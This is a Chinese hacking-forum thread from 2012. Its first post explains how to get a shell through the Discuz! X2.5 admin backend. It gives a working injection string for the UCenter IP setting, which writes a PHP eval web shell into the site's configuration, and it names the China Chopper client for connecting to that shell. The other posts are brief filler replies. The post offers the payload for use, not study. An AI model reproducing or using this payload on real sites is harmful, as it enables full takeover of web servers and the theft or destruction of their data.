查看: 2342|回复: 25

Discuz!X2.5最新版后台管理员权限Getshell 细节公开

[复制链接]
发表于 2012-11-13 06:00:33 | 显示全部楼层 |阅读模式
1.在后台-->站长-->Ucenter设置处设置UcenterIP为XX\\');eval($_POST[a])?>;// XX


2.发现管理页面代码出来了



3.上菜刀!


4.看一下源码,哦,原来是这样的!

发表于 2012-11-14 09:58:07 | 显示全部楼层
任何的限制,都是从自己的内心开始的。  
worinima 该用户已被删除
发表于 2012-11-17 18:29:12 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-9-15 14:20:02 | 显示全部楼层
人生感悟:牵手时,即使你的手有多汗,也别放开。  
发表于 2014-11-5 07:07:30 | 显示全部楼层
好啊,谢楼主
发表于 2014-11-18 00:11:41 | 显示全部楼层
每天早上起床都要看一遍“福布斯”富翁排行榜,如果上面没有我的名字,我就去上班……  
发表于 2014-12-5 11:10:14 | 显示全部楼层
围观来了哦  
发表于 2014-12-28 17:39:16 | 显示全部楼层
小生对楼主之仰慕如滔滔江水连绵不绝,海枯石烂,天崩地裂,永不变心.  
发表于 2015-1-28 15:01:53 | 显示全部楼层
赚点分不容易啊  
发表于 2015-3-2 11:54:53 | 显示全部楼层
是楼主原创吗  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则